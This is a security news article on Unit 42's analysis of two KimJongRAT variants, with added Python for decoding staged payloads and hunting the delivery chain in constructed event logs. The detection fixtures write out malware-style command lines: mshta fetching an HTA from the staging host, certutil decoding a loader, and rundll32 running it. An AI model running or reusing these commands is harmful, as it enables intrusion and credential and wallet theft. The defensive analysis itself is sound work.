Unit 42 has uncovered two newly evolved variants of the KimJongRAT malware, one using traditional PE (Portable Executable) files and the other employing PowerShell-based scripts to infiltrate systems, steal data, and exfiltrate sensitive browser, email, and cryptocurrency wallet information.
Originally documented in 2013 and again in 2019, KimJongRAT has resurfaced with heightened stealth and advanced multistage delivery mechanisms that abuse legitimate content delivery networks (CDNs) to obscure its malicious payloads. As Unit 42 researchers emphasize, these latest iterations mark “a clear and ongoing threat,” showcasing how threat actors continue to enhance their toolkits.
The infection chain for both variants begins the same way: users are tricked into opening a Windows shortcut (LNK) file, often disguised as an official document, which downloads an HTA (HTML Application) file from the CDN host cdn.glitch[.]global.
In the PE variant, this HTA drops a decoy PDF, a loader (sys.dll), and a text file with URLs for additional payloads. The PowerShell variant follows a similar path but replaces the loader with PowerShell scripts and ZIP archives containing obfuscated stealer and keylogger modules.

The PE variant is methodically crafted:
- The HTA file drops a Base64-decoded DLL, which then:
  - Checks for sandbox environments, so that it only runs on real systems.
  - Downloads additional encrypted components, reflectively loads the stealer (net64.log), and eventually executes a powerful orchestrator (main64.log).
This orchestrator is capable of:
- Uploading stolen files and clipboard data via HTTP POST methods
- Receiving backdoor commands via GET requests
- Searching for sensitive document formats, including .hwp, .pdf, .docx, and .zip
- Exfiltrating browser credentials, FTP/email client data, and keylogs
Unit 42 notes that the malware’s orchestration capabilities are substantial, with the orchestrator employing multiple threads for keylogging, clipboard monitoring, and persistent data theft.
“The network communication is implemented in an infinite loop that uploads collected data and requests commands from the C2 server,” the researchers explain.
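The stages described above reach the host Base64-encoded and XOR-encrypted, and the stealer and orchestrator hide behind .log extensions, so the first question during triage of a recovered stage is simply whether it decodes to a PE image. The block below is an added example of that check; it is not Unit 42's code or the malware's own. It assumes a single-byte XOR key (the write-up does not state the key length), recovers that key from the known "MZ" prefix instead of brute-forcing, and uses a constructed fake PE header as its input.

```python
"""Recover a Base64 + single-byte-XOR staged payload and confirm it is a PE file.

Added triage example, not Unit 42's code or the malware's own. The single-byte
XOR key is an assumption for illustration; the sample input is constructed.
"""
import base64
import binascii
import struct


def is_pe(data: bytes) -> bool:
    """True when data starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (key 0 is the identity)."""
    return bytes(b ^ key for b in data)


def recover_payload(blob: bytes):
    """Base64-decode a stage and derive the XOR key from the known 'M' of 'MZ'.

    Returns (key, plaintext) when the result carries a valid PE header, else None.
    Key 0 covers stages that are only Base64-encoded.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    key = raw[0] ^ ord("M")  # known-plaintext: the first byte must decrypt to 'M'
    candidate = xor_bytes(raw, key)
    return (key, candidate) if is_pe(candidate) else None


def encode_stage(data: bytes, key: int) -> bytes:
    """Build a stage the way the chain delivers it: XOR, then Base64 (constructed)."""
    return base64.b64encode(xor_bytes(data, key))


def build_sample(key: int = 0x5A) -> bytes:
    """Constructed fake stage: minimal DOS stub whose e_lfanew points at 'PE\\0\\0' at 0x40."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    header[0x40:0x44] = b"PE\0\0"
    return encode_stage(bytes(header), key)


if __name__ == "__main__":
    result = recover_payload(build_sample())
    if result is None:
        print("no PE recovered")
    else:
        print(f"key=0x{result[0]:02x} pe={is_pe(result[1])}")
```

Because the key is derived from one known plaintext byte and then verified against the full DOS/PE header, a stage that is not a PE image (or that uses a longer key) is rejected rather than mis-decoded; extending the check to a multi-byte key would mean deriving one key byte per known header byte in the same way.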
In contrast, the PowerShell variant is more focused. It deploys its stealer and keylogger via embedded scripts in a ZIP archive. Notably, it implements comprehensive surveillance of browser data, particularly for cryptocurrency wallet extensions.
According to Unit 42, “this new analysis reveals the PowerShell variant’s special focus on cryptocurrency,” identifying and targeting browser extensions for MetaMask, Trust Wallet, TronLink, Exodus Web3 Wallet, and over 30 other crypto wallets.
The stealer achieves persistence by adding a Windows registry entry (WindowsSecurityCheck) and continuously scans for:
- Cookies
- Saved login credentials
- Installed extensions and browser activity
- Cryptocurrency wallet data
- Recently accessed documents and archive files
Unit 42’s forensic breakdown reveals that the stealer even terminates browser processes so that their locked credential and cookie databases can be copied, encrypts the copies, and sends them to the attacker’s command-and-control (C2) server using scheduled operations.
Both variants share several advanced traits:
- Abuse of trusted CDNs for payload delivery
- Obfuscation via Base64 encoding and XOR-based encryption
- Multistage loaders that segment execution to evade detection
- Use of legitimate tools like certutil.exe, rundll32.exe, and mshta.exe
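The delivery chain on this page (mshta.exe fetching an HTA from cdn.glitch[.]global after an LNK is opened, certutil.exe and rundll32.exe handling the loader) together with the WindowsSecurityCheck persistence value give a hunter enough to write a first detection pass. The block below is an added example of such rules run over constructed Sysmon-style process-creation and registry events; it is not Unit 42's tooling. It assumes the persistence value lives under a CurrentVersion\Run key (the write-up names only the value), that certutil.exe is the component performing the Base64 decode, and the HTA URL path and rundll32 ordinal in the sample events are made up.

```python
"""Hunt for the KimJongRAT delivery chain and persistence in Sysmon-style events.

Added example, not Unit 42's tooling. Events are constructed; the Run-key
location of WindowsSecurityCheck, certutil as the decoder, and the sample
URL path and rundll32 ordinal are assumptions.
"""
import re
from collections import defaultdict

# Indicators taken from the write-up
STAGING_HOST = "cdn.glitch.global"
PERSISTENCE_VALUE = "WindowsSecurityCheck"
STAGE_NAMES = {"sys.dll", "net64.log", "main64.log"}

USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(?:Users|ProgramData|Windows\\Temp)\\", re.I)
DLL_ARG = re.compile(r'"?([A-Za-z]:\\[^",]+\.dll)"?', re.I)

DELIVERY_RULES = {
    "mshta_remote_hta_from_cdn",
    "mshta_spawned_by_explorer",
    "certutil_base64_decode",
    "rundll32_dll_from_user_path",
}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def rules_for(event: dict) -> list[str]:
    """Return the names of every rule a single event trips."""
    hits = []
    if event["type"] == "process":
        image = _basename(event["image"])
        parent = _basename(event.get("parent", ""))
        cmd = event["cmdline"]
        if image == "mshta.exe" and STAGING_HOST in cmd.lower():
            hits.append("mshta_remote_hta_from_cdn")
        if image == "mshta.exe" and parent == "explorer.exe":  # LNK double-click lands here
            hits.append("mshta_spawned_by_explorer")
        if image == "certutil.exe" and re.search(r"\s-decode\b", cmd, re.I):
            hits.append("certutil_base64_decode")
        if image == "rundll32.exe":
            m = DLL_ARG.search(cmd)
            if m and USER_WRITABLE.match(m.group(1)):
                hits.append("rundll32_dll_from_user_path")
        if any(name in cmd.lower() for name in STAGE_NAMES):
            hits.append("known_stage_filename")
    elif event["type"] == "registry":
        key = event["key"].lower()
        if "\\currentversion\\run\\" in key and key.rsplit("\\", 1)[-1] == PERSISTENCE_VALUE.lower():
            hits.append("run_key_windowssecuritycheck")
    return hits


def analyze(events: list[dict]) -> dict[str, list[str]]:
    """Collect the distinct rule hits per host."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(rules_for(ev))
    return {host: sorted(rules) for host, rules in per_host.items()}


def chain_detected(rule_hits, threshold: int = 3) -> bool:
    """Escalate when enough distinct delivery-chain rules fire on one host."""
    return len(DELIVERY_RULES & set(rule_hits)) >= threshold


# Constructed sample telemetry: WS01 shows the chain, WS02 is benign rundll32 use.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://cdn.glitch.global/example/stage.hta"},
    {"type": "process", "host": "WS01", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\sys.txt C:\Users\Public\sys.dll"},
    {"type": "process", "host": "WS01", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\sys.dll,#1"},
    {"type": "registry", "host": "WS01",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsSecurityCheck"},
    {"type": "process", "host": "WS02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_EVENTS).items():
        print(host, hits, "CHAIN" if chain_detected(hits) else "")
```

The per-event rules are deliberately narrow (a user-writable DLL path for rundll32.exe, a decode switch for certutil.exe, the staging host for mshta.exe) so that the benign rundll32 invocation on WS02 produces nothing, while the escalation happens only when several stages of the chain are seen on the same host.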
Perhaps most striking is the adaptability of KimJongRAT, evolving from a 2019 campaign tied to Operation Giant Baby and now re-emerging with modernized infrastructure and a growing emphasis on cryptocurrency theft.